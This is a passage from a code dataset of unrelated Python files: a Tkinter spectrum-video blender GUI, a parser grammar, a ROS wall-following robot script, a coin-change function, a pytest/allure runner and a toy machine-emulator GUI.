rely=rely, anchor='nw')\n\n rely += devy\n entry_bg = tk.Entry(master=frame1, textvariable=tk_bg_path)\n entry_bg.place(relwidth=0.28, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n btn_bg = tk.Button(master=frame1, text=lang[\"Background Image\"], command=selectBG)\n btn_bg.place(relwidth=0.15, relheight=relh, relx=0.34, rely=rely, anchor='nw')\n\n entry_logo = tk.Entry(master=frame1, textvariable=tk_logo_path)\n entry_logo.place(relwidth=0.29, relheight=relh, relx=0.5, rely=rely, anchor='nw')\n btn_logo = tk.Button(master=frame1, text=lang[\"Logo File\"], command=selectLogo)\n btn_logo.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_textplz = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Your Text:\"]), anchor=\"e\")\n label_textplz.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_text = tk.Entry(master=frame1, textvariable=tk_text)\n entry_text.place(relwidth=0.18, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n entry_text.bind(\"<Return>\", fastPreview)\n entry_text.bind('<FocusOut>', fastPreview)\n tk_text.set(\"Hello World!\")\n\n label_text_brt = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Text Brt.:\"]), anchor=\"e\")\n label_text_brt.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_text_brt = ttk.Combobox(master=frame1, textvariable=tk_text_brt)\n entry_text_brt[\"values\"] = (1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 0.0)\n entry_text_brt.current(0)\n entry_text_brt.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n label_font = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Font Size:\"]), anchor=\"e\")\n label_font.place(relwidth=0.08, relheight=relh, relx=0.51, rely=rely, anchor='nw')\n\n entry_relsize = ttk.Combobox(master=frame1, textvariable=tk_relsize)\n entry_relsize[\"values\"] = (3.0, 2.8, 2.5, 2.2, 2.0, 1.8, 1.5, 1.2, 1.0, 0.8, 0.5)\n entry_relsize.current(8)\n entry_relsize.place(relwidth=0.05, relheight=relh, relx=0.59, rely=rely, anchor='nw')\n\n entry_font = tk.Entry(master=frame1, textvariable=tk_font)\n entry_font.place(relwidth=0.14, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n btn_font = tk.Button(master=frame1, text=lang[\"Font File\"], command=selectFont)\n btn_font.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_size = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Video Size:\"]), anchor=\"e\")\n label_size.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_width = tk.Entry(master=frame1, textvariable=tk_width)\n entry_width.place(relwidth=0.05, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n entry_width.bind(\"<Return>\", fastPreview)\n entry_width.bind('<FocusOut>', fastPreview)\n\n label_mul = tk.Label(master=frame1, textvariable=tk.StringVar(value=\"x\"))\n label_mul.place(relwidth=0.03, relheight=relh, relx=0.2, rely=rely, anchor='nw')\n\n entry_height = tk.Entry(master=frame1, textvariable=tk_height)\n entry_height.place(relwidth=0.05, relheight=relh, relx=0.23, rely=rely, anchor='nw')\n entry_height.bind(\"<Return>\", fastPreview)\n entry_height.bind('<FocusOut>', fastPreview)\n\n label_fps = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"FPS:\"]), anchor=\"e\")\n label_fps.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_fps = ttk.Combobox(master=frame1, textvariable=tk_fps)\n entry_fps[\"values\"] = (60.0, 50.0, 30.0, 25.0, 20.0, 15.0)\n 
entry_fps.current(2)\n entry_fps.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n label_brv = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Video BR (Mbps):\"]), anchor=\"e\")\n label_brv.place(relwidth=0.12, relheight=relh, relx=0.53, rely=rely, anchor='nw')\n entry_brv = tk.Entry(master=frame1, textvariable=tk_br_video)\n entry_brv.place(relwidth=0.05, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n\n btn_autob = tk.Button(master=frame1, text=lang[\"Auto Bit Rate\"], command=autoBitrate)\n btn_autob.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_bra = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Audio BR:\"]), anchor=\"e\")\n label_bra.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n list_bra = ttk.Combobox(master=frame1, textvariable=tk_br_audio)\n list_bra[\"values\"] = (320, 256, 192, 128, 96, 64, 48)\n list_bra.current(0)\n list_bra.place(relwidth=0.08, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n label_kbps = tk.Label(master=frame1, textvariable=tk.StringVar(value=\"Kbps\"), anchor=\"w\")\n label_kbps.place(relwidth=0.05, relheight=relh, relx=0.23, rely=rely, anchor='nw')\n\n check_normal = tk.Checkbutton(master=frame1, text=lang[\"Normalize Volume\"],\n variable=tk_audio_normal, onvalue=True, offvalue=False, anchor=\"e\")\n check_normal.place(relwidth=0.15, relheight=relh, relx=0.3, rely=rely, anchor='nw')\n\n label_bg_mode = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"BG Mode:\"]), anchor=\"e\")\n label_bg_mode.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n list_bg_mode = ttk.Combobox(master=frame1, textvariable=tk_bg_mode, state=\"readonly\")\n bg_mode_dic = {\n lang[\"Blurred BG Image\"]: [True, 0],\n lang[\"Normal BG Image\"]: [False, 0],\n lang[\"Blurred BG Only\"]: [True, 2],\n lang[\"Normal BG Only\"]: [False, 2],\n lang[\"Transparent\"]: [False, -1],\n lang[\"Spectrum Only\"]: [False, -2],\n }\n\n list_bg_mode[\"values\"] = dict2tuple(bg_mode_dic)\n list_bg_mode.current(0)\n list_bg_mode.bind(\"<<ComboboxSelected>>\", setFileType)\n list_bg_mode.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_range = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Analyze Freq:\"]), anchor=\"e\")\n label_range.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_low = tk.Entry(master=frame1, textvariable=tk_fq_low)\n entry_low.place(relwidth=0.05, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n label_to = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"to\"]))\n label_to.place(relwidth=0.03, relheight=relh, relx=0.2, rely=rely, anchor='nw')\n entry_up = tk.Entry(master=frame1, textvariable=tk_fq_high)\n entry_up.place(relwidth=0.05, relheight=relh, relx=0.23, rely=rely, anchor='nw')\n label_hz = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Hz\"]), anchor=\"w\")\n label_hz.place(relwidth=0.03, relheight=relh, relx=0.28, rely=rely, anchor='nw')\n\n label_bins = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Num:\"]), anchor=\"e\")\n label_bins.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_bins = ttk.Combobox(master=frame1, textvariable=tk_bins)\n entry_bins[\"values\"] = (6, 12, 18, 24, 36, 48, 60, 72, 84, 96, 108, 120)\n entry_bins.current(5)\n entry_bins.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n 
label_scalar = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Scalar:\"]), anchor=\"e\")\n label_scalar.place(relwidth=0.12, relheight=relh, relx=0.53, rely=rely, anchor='nw')\n entry_scalar = ttk.Combobox(master=frame1, textvariable=tk_scalar)\n entry_scalar[\"values\"] = (0.05, 0.1, 0.2, 0.5, 0.7, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0)\n entry_scalar.current(5)\n entry_scalar.place(relwidth=0.05, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n\n label_color = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spec. Hue:\"]), anchor=\"e\")\n label_color.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n list_color = ttk.Combobox(master=frame1, textvariable=tk_color, state=\"readonly\")\n\n color_dic = {\n lang[\"Rainbow 4x\"]: \"color4x\",\n lang[\"Rainbow 2x\"]: \"color2x\",\n lang[\"Rainbow 1x\"]: \"color1x\",\n lang[\"White\"]: \"white\",\n lang[\"Black\"]: \"black\",\n lang[\"Gray\"]: \"gray\",\n lang[\"Red\"]: \"red\",\n lang[\"Green\"]: \"green\",\n lang[\"Blue\"]: \"blue\",\n lang[\"Yellow\"]: \"yellow\",\n lang[\"Magenta\"]: \"magenta\",\n lang[\"Purple\"]: \"purple\",\n lang[\"Cyan\"]: \"cyan\",\n lang[\"Light Green\"]: \"lightgreen\",\n lang[\"Green - Blue\"]: \"green-blue\",\n lang[\"Magenta - Purple\"]: \"magenta-purple\",\n lang[\"Red - Yellow\"]: \"red-yellow\",\n lang[\"Yellow - Green\"]: \"yellow-green\",\n lang[\"Blue - Purple\"]: \"blue-purple\",\n }\n\n list_color[\"values\"] = dict2tuple(color_dic)\n list_color.current(0)\n list_color.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n\n label_style = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Style:\"]), anchor=\"e\")\n label_style.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n list_style = ttk.Combobox(master=frame1, textvariable=tk_style)\n\n style_dic = {\n lang[\"Solid Line\"]: 0,\n lang[\"Dot Line\"]: 1,\n lang[\"Single Dot\"]: 2,\n lang[\"Double Dot\"]: 7,\n lang[\"Concentric\"]: 8,\n lang[\"Line Graph\"]: 17,\n lang[\"Classic 1\"]: 9,\n lang[\"Classic 2\"]: 10,\n lang[\"Classic 3\"]: 15,\n lang[\"Classic 4\"]: 16,\n lang[\"Classic Dot 1\"]: 11,\n lang[\"Classic Dot 2\"]: 12,\n lang[\"Classic Dot 3\"]: 13,\n lang[\"Classic Dot 4\"]: 14,\n lang[\"Stem Plot 1\"]: 3,\n lang[\"Stem Plot 2\"]: 4,\n lang[\"Stem Plot 3\"]: 5,\n lang[\"Stem Plot 4\"]: 6,\n lang[\"No Spectrum\"]: -1,\n }\n list_style[\"values\"] = dict2tuple(style_dic)\n list_style[\"state\"] = \"readonly\"\n list_style.current(0)\n list_style.place(relwidth=0.13, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n\n label_linewidth = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Line Width:\"]), anchor=\"e\")\n label_linewidth.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_linewidth = ttk.Combobox(master=frame1, textvariable=tk_linewidth)\n entry_linewidth[\"values\"] = (\n 15.0, 12.0, 10.0, 8.0, 6.0, 5.0, 4.0, 3.0, 2.0, 1.5, 1.2, 1.0, 0.8, 0.6, 0.5, 0.4, 0.3)\n entry_linewidth.current(11)\n entry_linewidth.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n label_smooth = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Stabilize:\"]), anchor=\"e\")\n label_smooth.place(relwidth=0.15, relheight=relh, relx=0.50, rely=rely, anchor='nw')\n list_smooth = ttk.Combobox(master=frame1, textvariable=tk_smooth)\n list_smooth[\"values\"] = (0, 1, 2, 3, 5, 6, 7, 8, 9, 10)\n list_smooth.current(0)\n 
list_smooth.place(relwidth=0.05, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n\n label_saturation = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spec. Sat.:\"]), anchor=\"e\")\n label_saturation.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n entry_saturation = ttk.Combobox(master=frame1, textvariable=tk_saturation)\n entry_saturation[\"values\"] = (1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 0.0)\n entry_saturation.current(4)\n entry_saturation.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_rotate = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spin FG(rpm):\"]), anchor=\"e\")\n label_rotate.place(relwidth=0.15, relheight=relh, relx=0.3, rely=rely, anchor='nw')\n entry_rotate = ttk.Combobox(master=frame1, textvariable=tk_rotate)\n entry_rotate[\"values\"] = (6.0, 5.0, 4.0, 3.0, 2.0, 1.0, 0.0, - 1.0, -2.0, -3.0, -4.0, -5.0, -6.0)\n entry_rotate.current(6)\n entry_rotate.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n check_use_glow = tk.Checkbutton(master=frame1, text=lang[\"Glow Effect (SLOW)\"],\n variable=tk_use_glow, onvalue=True, offvalue=False, anchor=\"e\")\n check_use_glow.place(relwidth=0.15, relheight=relh, relx=0.55, rely=rely, anchor='nw')\n\n label_bright = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spec. Brt.:\"]), anchor=\"e\")\n label_bright.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n entry_bright = ttk.Combobox(master=frame1, textvariable=tk_bright)\n entry_bright[\"values\"] = (1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 0.0)\n entry_bright.current(4)\n entry_bright.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n scr = scrolledtext.ScrolledText(master=frame1, width=20, height=10)\n scr.place(relwidth=0.9, relheight=relh * 6.5, relx=0.05, rely=rely, anchor='nw')\n\n rely += relh * 6.8\n\n entry_output = tk.Entry(master=frame1, textvariable=tk_output_path)\n entry_output.place(relwidth=0.44, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_fname = tk.Entry(master=frame1, textvariable=tk_filename)\n entry_fname.place(relwidth=0.25, relheight=relh, relx=0.5, rely=rely, anchor='nw')\n label_mp4 = tk.Label(master=frame1, text=\".mp4\", anchor=\"w\")\n label_mp4.place(relwidth=0.05, relheight=relh, relx=0.75, rely=rely, anchor='nw')\n btn_output = tk.Button(master=frame1, text=lang[\"Output (REQUIRED)\"], command=selectOutput)\n btn_output.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n rely += devy\n\n progress = ttk.Progressbar(master=frame1, orient=tk.HORIZONTAL, mode='determinate', value=0)\n progress.place(relwidth=0.7, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n\n btn_blend = tk.Button(master=frame1, text=lang[\"Blend & Export\"], command=startBlending)\n btn_blend.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n loadConfig()\n clearLog()\n\n try:\n ctypes.windll.shcore.SetProcessDpiAwareness(1)\n ScaleFactor = ctypes.windll.shcore.GetScaleFactorForDevice(0)\n root.tk.call('tk', 'scaling', ScaleFactor / 75) # DPI settings\n root_view.tk.call('tk', 'scaling', ScaleFactor / 75)\n root_view.iconphoto(False, tk.PhotoImage(file='./Source/icon-small.png'))\n root.iconphoto(False, tk.PhotoImage(file='./Source/icon-small.png'))\n except:\n pass\n\n\n def disable_event():\n if fb.isRunning:\n tkinter.messagebox.showinfo(lang[\"Notice\"], lang[\"Please stop blending before 
quit!\"])\n else:\n root.destroy()\n\n\n def close_view():\n root_view.withdraw()\n\n\n root.protocol(\"WM_DELETE_WINDOW\", disable_event)\n root_view.protocol(\"WM_DELETE_WINDOW\", close_view)\n frame1.tkraise()\n showPreview()\n root.mainloop()\n","sub_path":"SourceCode/FanBlender_GUI.py","file_name":"FanBlender_GUI.py","file_ext":"py","file_size_in_byte":42455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"106017447","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nAuthor : Ntwali Bashige\nCopyright : Copyright 2019 - Ntwali Bashige\nLicense : MIT\nVersion : 0.0.1\nMaintainer : Ntwali Bashige\nEmail : ntwali.bashige@gmail.com\n\"\"\"\n\nfrom asm.parsing.parselets.expressions import LiteralParselet, AssignmentParselet, StaticExpressionParselet, DynamicExpressionParselet\nfrom asm.parsing.parselets.declarations import CircuitDeclarationParselet\nfrom common.token_type import TokenType\n\n\nclass Grammar(object):\n \"\"\"\n\n \"\"\"\n parselets = {\n TokenType.CIRCUIT : CircuitDeclarationParselet(),\n TokenType.IDENTIFIER : StaticExpressionParselet(),\n TokenType.PERCENT : DynamicExpressionParselet(),\n TokenType.EQUAL : AssignmentParselet(),\n TokenType.CBINARY : LiteralParselet(),\n }\n","sub_path":"as/src/asm/parsing/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"218442667","text":"#!/usr/bin/env python\nimport math\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\n\n\n# Check if there seems to be an object in front of the robot, on the data from the left value to the right value, if any of them are less than minRange then return's false\ndef freeFront(data, left, right, minRange):\n for i in range(left, right):\n ranger = data[i]\n if ranger < minRange:\n return False\n\n return True\n\n\n# Returns true if the robot can move forward the specified distance\n# (Takes into account width of robot)\ndef canMoveForward(data, distance):\n robotWidth = 1.5\n # How many reading it will check (distributed evenly across 180 degrees)\n values = range(1, 30)\n for i in values:\n maxReading = abs((robotWidth/2)/math.cos(math.radians((180/values[-1])*i)))\n if maxReading > distance:\n maxReading = distance\n reading = data[(len(data) / values[-1]) * i]\n #rospy.loginfo(\"Reading \"+str(maxReading) + \" ~ index \"+str((len(data) / values[-1]) * i))\n if reading < maxReading:\n return reading\n return -1\n\n\ndef findAverage(data, low, high):\n temp = 0;\n count = 0;\n for i in range(low, high):\n if (data[i] != float('NaN') and data[i] != float('Inf')):\n temp = temp + data[i]\n count = count + 1\n if count == 0:\n return 20\n else:\n return temp / count\n\n\ndef findGreater(data, fLow, fHigh, sLow, sHigh):\n firstAverage = findAverage(data, fLow, fHigh)\n secondAverage = findAverage(data, sLow, sHigh)\n\n rospy.loginfo(\n \"Front \" + str(firstAverage) + \"; Back \" + str(secondAverage) + \" = \" + str(firstAverage - secondAverage))\n\n return firstAverage - secondAverage\n\n\ndef laser_callback(laser_data):\n global detectedWall\n\n new_speed = Twist()\n\n maxSpeed = 0.3# 0.25\n maxRotateSpeed = 0.3# 0.3 # negative value = rotate right\n divider = 1\n\n # Values of laser indicators that indicate front\n frontLeft = 200\n frontRight = 300\n minRange = 0.75\n\n # Detected first wall\n maxRangeLeft = 1.5\n desRangeLeftMin = 0.75\n desRangeLeftMax = 0.76\n\n # Range to indicate back right\n firstLower = 0\n firstHigher = 64\n # Range to indicate front right\n secondLower = 64\n secondHigher = 128\n\n rospy.loginfo(\"STUFF \" + str(detectedWall))\n\n collision = canMoveForward(laser_data.ranges, minRange)\n\n if collision != -1:\n # find new wall by rotating\n if collision < 0.4:\n new_speed.linear.x = 0.0\n else:\n new_speed.linear.x = maxSpeed * 0.5\n new_speed.angular.z = maxRotateSpeed * 2\n rospy.loginfo(\"Rotating for collision \")\n else:\n new_speed.linear.x = maxSpeed\n averageLeft = findAverage(laser_data.ranges, firstLower, secondHigher)\n # if have a wall to our right\n if averageLeft < maxRangeLeft:\n if detectedWall < 100:\n detectedWall += 5\n if desRangeLeftMin <= averageLeft <= desRangeLeftMax:\n # wall is nicely away from us\n rospy.loginfo(\"Wall is nicely away from us\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = 0.0\n if averageLeft < desRangeLeftMin:\n # wall is too close: rotate away from wall\n rospy.loginfo(\"Wall is too close\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = maxRotateSpeed\n if averageLeft > desRangeLeftMax:\n # wall is too far: rotate towards wall\n rospy.loginfo(\"Wall is too far\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = -(maxRotateSpeed)\n\n if findGreater(laser_data.ranges, firstLower, firstHigher, secondLower, secondHigher) < -1:\n rospy.loginfo(\"Detected convex wall\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = 
-(maxRotateSpeed)\n else:\n # No wall to our left\n new_speed.linear.x = maxSpeed\n if detectedWall > 0:\n detectedWall -= 1\n if detectedWall > 25:\n new_speed.angular.z = -maxRotateSpeed * 1.5\n\n pub.publish(new_speed)\n\n\nif __name__ == '__main__':\n detectedWall = 0\n rospy.init_node('obstacle_stopper')\n\n raw_input('turn on motors and press enter to start')\n\n rospy.Subscriber('base_scan', LaserScan, laser_callback)\n pub = rospy.Publisher('cmd_vel', Twist, queue_size=100)\n rospy.spin()\n","sub_path":"exercise2/src/wall_hugger.py","file_name":"wall_hugger.py","file_ext":"py","file_size_in_byte":4592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"643487731","text":"#!/usr/bin/python\n\nimport sys\n\n\ndef making_change(amount, denominations):\n # Initialize cache\n cache = [0] * (amount + 1)\n cache[0] = 1\n\n # For each possible coin, starting with the smallest\n for coin in denominations:\n # For every amount between that coin value and the total amount\n for amount2 in range(coin, amount + 1):\n # Add the number of solutions found if we took out that coin\n cache[amount2] += cache[amount2 - coin]\n\n return cache[amount]\n\nif __name__ == \"__main__\":\n # Test our your implementation from the command line\n # with `python making_change.py [amount]` with different amounts\n if len(sys.argv) > 1:\n denominations = [1, 5, 10, 25, 50]\n amount = int(sys.argv[1])\n else:\n print(\"Usage: making_change.py [amount]\")\n","sub_path":"making_change/making_change.py","file_name":"making_change.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"365445636","text":"#coding:utf-8\nimport os\nimport pytest\nimport argparse\nfrom config import BaseConfig\nfrom common.tools import get_case_dir,send_dingding\nfrom common.utils import dingTalk\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(description=\"argparse\")\n parser.add_argument('--product', type=str, default=BaseConfig.current_name)\n return parser\n\n\nif __name__ == \"__main__\":\n parser = get_parser()\n args = parser.parse_args()\n BaseConfig.current_name = args.product\n # 获取要执行的产品的用例目录\n test_case_dir = get_case_dir(args.product)\n print(\"********此次执行的产品测试用例是:%s********\"%test_case_dir)\n\n #删除之前报告\n os.system('rm ./report/tmp/*.json')\n # 生成报告数据\n pytest.main(['-v', '-s', test_case_dir, '--alluredir', './report/tmp'])\n # 打开报告\n os.system('allure serve ./report/tmp')\n\n # 发送钉钉\n send_dingding(args.product)\n\n\n\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"500280972","text":"#!/usr/bin/env python3\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import filedialog\n\nfrom machine import Machine\nfrom gui_mem_inspect import MemInspect\n\nclass Gui(Tk):\n def __init__(self, machine):\n super().__init__()\n self.machine = machine\n self.title(\"Windlass\")\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n\n # Create mainframe inside of root window. Seems redundant, but\n # ttk widgets can be themed, while regular tkninter widgets can't.\n mainframe = ttk.Frame(self, padding=\"3 3 3 3\", relief=\"flat\")\n mainframe.grid(column=0, row=0, sticky=(N, S, E, W))\n mainframe.columnconfigure(0, weight=1)\n mainframe.rowconfigure(0, weight=1)\n\n # Create topframe that will hold the buttons & registers.\n topframe = ttk.Frame(mainframe, relief=\"flat\")\n topframe.grid(column=0, row=0, sticky=(N, S, E, W))\n topframe.columnconfigure(0, weight=1)\n topframe.rowconfigure(0, weight=1)\n \n\n # --------------------------------------------------------------------\n # BUTTONS\n # --------------------------------------------------------------------\n button_frame = ttk.Frame(topframe, relief=\"sunken\")\n button_frame.grid(column=0, row=0)\n buttons = [ ttk.Button(button_frame, text=\"Load\", command=self._load)\n , ttk.Button(button_frame, text=\"Step\", command=self._step)\n , ttk.Button(button_frame, text=\"Run\", command=self._run)\n , ttk.Button(button_frame, text=\"Stop\", command=self._stop)\n ]\n for button in buttons:\n button.pack(side=LEFT)\n\n # --------------------------------------------------------------------\n # REGISTERS & IO\n # --------------------------------------------------------------------\n # StringVars for register Entry widgets.\n self.PC = StringVar()\n self.IR = StringVar()\n self.OR = StringVar()\n self.ACC = StringVar()\n self.input = StringVar()\n self.output = StringVar()\n \n self._copy_registers()\n \n register_frame = ttk.Frame(topframe)\n register_frame.grid(column=0, row=1, pady=3, sticky=(N, S, E, W))\n \n PC_label = ttk.Label(register_frame, text=\"PC\")\\\n .grid(row=0, column=0, sticky=W)\n PC_entry = Entry(register_frame)\n PC_entry.config(width=7, textvariable=self.PC, relief=\"flat\")\n PC_entry.grid(row=0, column=1, sticky=E)\n \n IR_label = ttk.Label(register_frame, text=\"IR\")\\\n .grid(row=1, column=0, sticky=W)\n IR_entry = Entry(register_frame)\n IR_entry.config(width=7, textvariable=self.IR, relief=\"flat\")\n IR_entry.grid(row=1, column=1, sticky=E)\n \n OR_label = ttk.Label(register_frame, text=\"OR\")\\\n .grid(row=2, column=0, sticky=W)\n OR_entry = Entry(register_frame)\n OR_entry.config(width=7, textvariable=self.OR, relief=\"flat\")\n OR_entry.grid(row=2, column=1, sticky=E)\n \n ACC_label = ttk.Label(register_frame, text=\"ACC\")\\\n .grid(row=3, column=0, sticky=W)\n ACC_entry = Entry(register_frame)\n ACC_entry.config(width=7, textvariable=self.ACC, relief=\"flat\")\n ACC_entry.grid(row=3, column=1, sticky=E)\n\n # --------------------------------------------------------------------\n # STATUS\n # --------------------------------------------------------------------\n # status_frame = ttk.Frame(mainframe)\n # status_frame.grid(column=1, row=2, sticky=(S, E, W))\n\n # self.status = StringVar()\n # self.status.set('HALTed')\n # status = Label(status_frame, textvariable=self.status)\n # status.pack(fill=BOTH)\n \n # --------------------------------------------------------------------\n # I/O\n # 
--------------------------------------------------------------------\n bottomframe = ttk.Frame(mainframe)\n bottomframe.grid(row=1, column=0, sticky=(N, S, E, W))\n\n self.console = Text(bottomframe)\n self.console.config(width=80, height=12)\n self.console.grid(row=0, column=0, sticky=(N, S, E, W))\n self.console.config(state=DISABLED)\n # TODO: Disable scrolling w/ mousewheel.\n # TODO: Lock view to bottom of buffer ('autoscroll')\n\n self.input = Entry(bottomframe)\n self.input.config(width=80)\n self.input.grid(row=1, column=0, sticky=(E, W))\n self.input.config(state=DISABLED)\n\n self._print(\"Machine ready.\")\n\n\n # --------------------------------------------------------------------\n # BUTTON COMMANDS\n # --------------------------------------------------------------------\n \n def _load(self):\n self.machine.load_text(filedialog.askopenfilename())\n\n #self.status.set(\"Program loaded. Click step to step through\")\n\n def _step(self):\n self.machine.step()\n self._copy_registers()\n #if self.machine.needs_input:\n # self.status.set(\"Machine needs input.\\n\"\n # \"Enter value in input field and press enter.\")\n \n def _run(self):\n self.machine.run()\n self._copy_registers()\n #if self.machine.needs_input:\n # self.status.set(\"Machine needs input.\\n\"\n # \"Enter value in input field and press enter.\")\n\n def _stop(self):\n self.machine.running = False # TODO: Reduce coupling\n\n # --------------------------------------------------------------------\n # PRIVATE HELPERS\n # --------------------------------------------------------------------\n\n def _copy_registers(self):\n # TODO: Reduce coupling\n self.PC.set(self.machine.PC)\n self.OR.set(self.machine.OR)\n self.IR.set(str(self.machine.IR))\n self.ACC.set(self.machine.ACC)\n\n def _give_input(self, *args):\n self.machine.take_input(self.input.get())\n self._copy_registers()\n #self.status.set(\"Input accepted, HALT'd.\")\n\n def _print(self, s):\n self.console.config(state=NORMAL)\n self.console.insert(END, s + \"\\n\")\n self.console.config(state=DISABLED)\n\nif __name__ == \"__main__\":\n m = Machine()\n g = Gui(m)\n mi = MemInspect(g)\n g.mainloop()\n","sub_path":"gui_main.py","file_name":"gui_main.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
